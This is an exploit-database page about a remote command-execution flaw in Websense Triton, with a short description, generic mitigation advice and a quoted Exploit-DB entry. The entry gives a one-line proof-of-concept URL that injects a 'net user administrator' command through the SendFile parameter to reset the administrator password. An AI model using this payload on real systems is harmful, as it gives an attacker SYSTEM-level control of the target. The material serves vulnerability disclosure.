header-logo
Suggest Exploit
vendor:
Websense Triton
by:
7.5
CVSS
HIGH
Remote Command Execution
CWE
Product Name: Websense Triton
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote Command Execution Vulnerability in Websense Triton

The vulnerability allows an attacker to execute arbitrary commands with SYSTEM-level privileges by exploiting a specific URL parameter in the Websense Triton software. Successful exploitation of this vulnerability will lead to the complete compromise of affected computers.

Mitigation:

It is recommended to apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. Additionally, restricting access to the affected URL or disabling the vulnerable functionality can also help in preventing exploitation.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/51086/info

Websense Triton is prone to a remote command-execution vulnerability.

An attacker can exploit this issue to execute arbitrary commands with SYSTEM-level privileges. Successfully exploiting this issue will result in the complete compromise of affected computers. 

https://www.example.com/explorer_wse/ws_irpt.exe?&SendFile=echo.pdf%26net user administrator blah|

Navigation

Suggest Exploit

Services By CQR